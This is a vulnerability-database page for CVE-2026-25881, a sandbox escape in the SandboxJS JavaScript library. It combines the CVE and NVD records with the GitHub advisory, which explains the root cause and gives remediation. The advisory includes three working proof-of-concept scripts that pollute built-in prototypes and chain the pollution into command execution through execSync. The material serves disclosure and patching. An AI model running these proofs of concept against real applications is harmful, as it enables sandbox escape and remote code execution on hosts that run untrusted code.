Vulnerability-Lookup

CVE-2026-25881 (GCVE-0-2026-25881)

Vulnerability from cvelistv5 – Published: 2026-02-09 21:12 – Updated: 2026-02-10 15:58

Title

@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)

Summary

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)). This vulnerability is fixed in 0.8.31.

Severity ?

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/nyariv/SandboxJS/security/advi…	x_refsource_CONFIRM
	https://github.com/nyariv/SandboxJS/commit/f369f8…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	nyariv	SandboxJS	Affected: < 0.8.31

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25881",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-10T15:32:04.953082Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-10T15:58:08.474Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SandboxJS",
          "vendor": "nyariv",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.8.31"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)). This vulnerability is fixed in 0.8.31."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-09T21:12:58.981Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj"
        },
        {
          "name": "https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53"
        }
      ],
      "source": {
        "advisory": "GHSA-ww7g-4gwx-m7wj",
        "discovery": "UNKNOWN"
      },
      "title": "@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25881",
    "datePublished": "2026-02-09T21:12:58.981Z",
    "dateReserved": "2026-02-06T21:08:39.129Z",
    "dateUpdated": "2026-02-10T15:58:08.474Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25881\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-09T22:16:03.423\",\"lastModified\":\"2026-02-18T18:07:12.937\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)). This vulnerability is fixed in 0.8.31.\"},{\"lang\":\"es\",\"value\":\"SandboxJS es una biblioteca de sandboxing de JavaScript. Antes de la versi\u00f3n 0.8.31, una vulnerabilidad de escape de sandbox permite que el c\u00f3digo en sandbox mute los prototipos integrados del host al blanquear la bandera de protecci\u00f3n \u0027isGlobal\u0027 a trav\u00e9s de intermediarios de literales de array. Cuando una referencia de prototipo global (por ejemplo, Map.prototype, Set.prototype) se coloca en un array y se recupera, la marca \u0027isGlobal\u0027 se elimina, permitiendo la mutaci\u00f3n directa del prototipo desde dentro del sandbox. Esto resulta en una contaminaci\u00f3n persistente de prototipos del lado del host y puede habilitar RCE en aplicaciones que usan propiedades contaminadas en sumideros sensibles (ejemplo de gadget: execSync(obj.cmd)). Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 0.8.31.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"0.8.31\",\"matchCriteriaId\":\"626B7924-ECB8-4661-A9FA-3A12B095F1DE\"}]}]}],\"references\":[{\"url\":\"https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25881\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-10T15:32:04.953082Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-10T15:32:05.641Z\"}}], \"cna\": {\"title\": \"@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)\", \"source\": {\"advisory\": \"GHSA-ww7g-4gwx-m7wj\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nyariv\", \"product\": \"SandboxJS\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.8.31\"}]}], \"references\": [{\"url\": \"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj\", \"name\": \"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53\", \"name\": \"https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)). This vulnerability is fixed in 0.8.31.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1321\", \"description\": \"CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-09T21:12:58.981Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25881\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-10T15:58:08.474Z\", \"dateReserved\": \"2026-02-06T21:08:39.129Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-09T21:12:58.981Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-WW7G-4GWX-M7WJ

Vulnerability from github – Published: 2026-02-10 00:24 – Updated: 2026-02-10 02:56

Summary

@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)

Details

Summary

A sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)).

Details

Root Cause:

The sandbox implements a protection mechanism using the isGlobal flag in the Prop class to prevent modification of global objects and their prototypes. However, this taint tracking is lost when values pass through array/object literal creation.

Vulnerable Code Path `src/executor.ts`(L559-L571):

addOps(LispType.CreateArray, (exec, done, ticks, a, b: Lisp[], obj, context, scope) => {
  const items = (b as LispItem[])
    .map((item) => {
      if (item instanceof SpreadArray) {
        return [...item.item];
      } else {
        return item;
      }
    })
    .flat()
    .map((item) => valueOrProp(item, context));  // <- isGlobal flag lost here
  done(undefined, items);
});

Exploitation Flow:

Sandboxed code: const m=[Map.prototype][0]
              ↓
Array creation: isGlobal taint stripped via valueOrProp()
              ↓
Prototype mutation: m.cmd='id' (host prototype polluted)
              ↓
Host-side impact: new Map().cmd === 'id' (persistent)
              ↓
RCE (application-dependent): host code calls execSync(obj.cmd)

Protection Bypass Location `src/utils.ts`(L380-L385):

set(key: string, val: unknown) {
  // ...
  if (prop.isGlobal) {  // <- This check is bypassed
    throw new SandboxError(`Cannot override global variable '${key}'`);
  }
  (prop.context as any)[prop.prop] = val;
  return prop;
}

When the prototype is accessed via array retrieval, the isGlobal flag is no longer set, so this protection is never triggered.

PoC

Prototype pollution via array intermediary:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const arr=[Map.prototype];
  const p=arr[0];
  p.polluted='pwned';
  return 'done';
`)().run();

console.log('polluted' in ({}), new Map().polluted);

Observed output: false pwned

Overwrite `Set.prototype.has`:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const s=[Set.prototype][0];
  s.has=isFinite;
  return 'done';
`)().run();

console.log('has overwritten:', Set.prototype.has === isFinite);

Observed output: has overwritten: true

RCE via host gadget (prototype pollution -> execSync):

const Sandbox = require('@nyariv/sandboxjs').default;
const { execSync } = require('child_process');
const sandbox = new Sandbox();

sandbox.compile(`
  const m=[Map.prototype][0];
  m.cmd='id';
  return 'done';
`)().run();

const obj = new Map();
const out = execSync(obj.cmd, { encoding: 'utf8' }).trim();
console.log(out);

Observed output: uid=501(user) gid=20(staff) groups=20(staff),...

Impact

This is a sandbox escape: untrusted sandboxed code can persistently mutate host built-in prototypes (e.g., Map.prototype, Set.prototype), breaking isolation and impacting subsequent host execution. RCE is possible in applications that later use attacker-controlled (polluted) properties in sensitive sinks (e.g., passing obj.cmd to child_process.execSync).

Affected Systems: any application using @nyariv/sandboxjs to execute untrusted JavaScript.

Remediation

Preserve isGlobal protection across array/object literal creation (do not unwrap Prop into raw values in a way that drops the global/prototype taint).
Add a hard block on writes to built-in prototypes (e.g., Map.prototype, Set.prototype, etc.) even if they are obtained indirectly through literals.
Defense-in-depth: freeze built-in prototypes in the host process before running untrusted code (may be breaking for some consumers).

Severity ?

9.0 (Critical)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.30"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nyariv/sandboxjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.31"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25881"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-10T00:24:53Z",
    "nvd_published_at": "2026-02-09T22:16:03Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the `isGlobal` protection flag through array literal intermediaries. When a global prototype reference (e.g., `Map.prototype`, `Set.prototype`) is placed into an array and retrieved, the `isGlobal` taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: `execSync(obj.cmd)`).\n\n### Details\n#### Root Cause:\nThe sandbox implements a protection mechanism using the `isGlobal` flag in the Prop class to prevent modification of global objects and their prototypes. However, this taint tracking is lost when values pass through array/object literal creation.\n\n#### Vulnerable Code Path `src/executor.ts`([L559-L571](https://github.com/nyariv/SandboxJS/blob/main/src/executor.ts#L559-L571)):\n```ts\naddOps(LispType.CreateArray, (exec, done, ticks, a, b: Lisp[], obj, context, scope) =\u003e {\n  const items = (b as LispItem[])\n    .map((item) =\u003e {\n      if (item instanceof SpreadArray) {\n        return [...item.item];\n      } else {\n        return item;\n      }\n    })\n    .flat()\n    .map((item) =\u003e valueOrProp(item, context));  // \u003c- isGlobal flag lost here\n  done(undefined, items);\n});\n```\n#### Exploitation Flow:\n```txt\nSandboxed code: const m=[Map.prototype][0]\n              \u2193\nArray creation: isGlobal taint stripped via valueOrProp()\n              \u2193\nPrototype mutation: m.cmd=\u0027id\u0027 (host prototype polluted)\n              \u2193\nHost-side impact: new Map().cmd === \u0027id\u0027 (persistent)\n              \u2193\nRCE (application-dependent): host code calls execSync(obj.cmd)\n```\n\n#### Protection Bypass Location `src/utils.ts`([L380-L385](https://github.com/nyariv/SandboxJS/blob/main/src/utils.ts#L380-L385)):\n```ts\nset(key: string, val: unknown) {\n  // ...\n  if (prop.isGlobal) {  // \u003c- This check is bypassed\n    throw new SandboxError(`Cannot override global variable \u0027${key}\u0027`);\n  }\n  (prop.context as any)[prop.prop] = val;\n  return prop;\n}\n```\nWhen the prototype is accessed via array retrieval, the `isGlobal` flag is no longer set, so this protection is never triggered.\n\n### PoC\n#### Prototype pollution via array intermediary:\n```js\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst sandbox = new Sandbox();\n\nsandbox.compile(`\n  const arr=[Map.prototype];\n  const p=arr[0];\n  p.polluted=\u0027pwned\u0027;\n  return \u0027done\u0027;\n`)().run();\n\nconsole.log(\u0027polluted\u0027 in ({}), new Map().polluted);\n```\n**Observed output**: `false pwned`\n\n#### Overwrite `Set.prototype.has`:\n```js\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst sandbox = new Sandbox();\n\nsandbox.compile(`\n  const s=[Set.prototype][0];\n  s.has=isFinite;\n  return \u0027done\u0027;\n`)().run();\n\nconsole.log(\u0027has overwritten:\u0027, Set.prototype.has === isFinite);\n```\n\n**Observed output**: `has overwritten: true`\n\n#### RCE via host gadget (prototype pollution -\u003e execSync):\n```js\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst { execSync } = require(\u0027child_process\u0027);\nconst sandbox = new Sandbox();\n\nsandbox.compile(`\n  const m=[Map.prototype][0];\n  m.cmd=\u0027id\u0027;\n  return \u0027done\u0027;\n`)().run();\n\nconst obj = new Map();\nconst out = execSync(obj.cmd, { encoding: \u0027utf8\u0027 }).trim();\nconsole.log(out);\n```\n\n**Observed output**: `uid=501(user) gid=20(staff) groups=20(staff),...`\n\n### Impact\nThis is a sandbox escape: untrusted sandboxed code can persistently mutate host built-in prototypes (e.g., `Map.prototype`, `Set.prototype`), breaking isolation and impacting subsequent host execution. RCE is possible in applications that later use attacker-controlled (polluted) properties in sensitive sinks (e.g., passing `obj.cmd` to `child_process.execSync`).\n\n**Affected Systems**: any application using `@nyariv/sandboxjs` to execute untrusted JavaScript.\n\n### Remediation\n- Preserve `isGlobal` protection across array/object literal creation (do not unwrap `Prop` into raw values in a way that drops the global/prototype taint).\n- Add a hard block on writes to built-in prototypes (e.g., `Map.prototype`, `Set.prototype`, etc.) even if they are obtained indirectly through literals.\n- Defense-in-depth: freeze built-in prototypes in the host process before running untrusted code (may be breaking for some consumers).",
  "id": "GHSA-ww7g-4gwx-m7wj",
  "modified": "2026-02-10T02:56:33Z",
  "published": "2026-02-10T00:24:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25881"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nyariv/SandboxJS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)"
}

FKIE_CVE-2026-25881

Vulnerability from fkie_nvd - Published: 2026-02-09 22:16 - Updated: 2026-02-18 18:07

Severity ?

9.0 (Critical) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53	Patch
	security-advisories@github.com	https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	nyariv	sandboxjs	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "626B7924-ECB8-4661-A9FA-3A12B095F1DE",
              "versionEndExcluding": "0.8.31",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SandboxJS is a JavaScript sandboxing library. Prior to 0.8.31, a sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)). This vulnerability is fixed in 0.8.31."
    },
    {
      "lang": "es",
      "value": "SandboxJS es una biblioteca de sandboxing de JavaScript. Antes de la versi\u00f3n 0.8.31, una vulnerabilidad de escape de sandbox permite que el c\u00f3digo en sandbox mute los prototipos integrados del host al blanquear la bandera de protecci\u00f3n \u0027isGlobal\u0027 a trav\u00e9s de intermediarios de literales de array. Cuando una referencia de prototipo global (por ejemplo, Map.prototype, Set.prototype) se coloca en un array y se recupera, la marca \u0027isGlobal\u0027 se elimina, permitiendo la mutaci\u00f3n directa del prototipo desde dentro del sandbox. Esto resulta en una contaminaci\u00f3n persistente de prototipos del lado del host y puede habilitar RCE en aplicaciones que usan propiedades contaminadas en sumideros sensibles (ejemplo de gadget: execSync(obj.cmd)). Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 0.8.31."
    }
  ],
  "id": "CVE-2026-25881",
  "lastModified": "2026-02-18T18:07:12.937",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-02-09T22:16:03.423",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1321"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25881 (GCVE-0-2026-25881)

GHSA-WW7G-4GWX-M7WJ

Summary

Details

Root Cause:

Vulnerable Code Path src/executor.ts(L559-L571):

Exploitation Flow:

Protection Bypass Location src/utils.ts(L380-L385):

PoC

Prototype pollution via array intermediary:

Overwrite Set.prototype.has:

RCE via host gadget (prototype pollution -> execSync):

Impact

Remediation

FKIE_CVE-2026-25881

Tags

Sightings

Nomenclature

Vulnerable Code Path `src/executor.ts`(L559-L571):

Protection Bypass Location `src/utils.ts`(L380-L385):

Overwrite `Set.prototype.has`: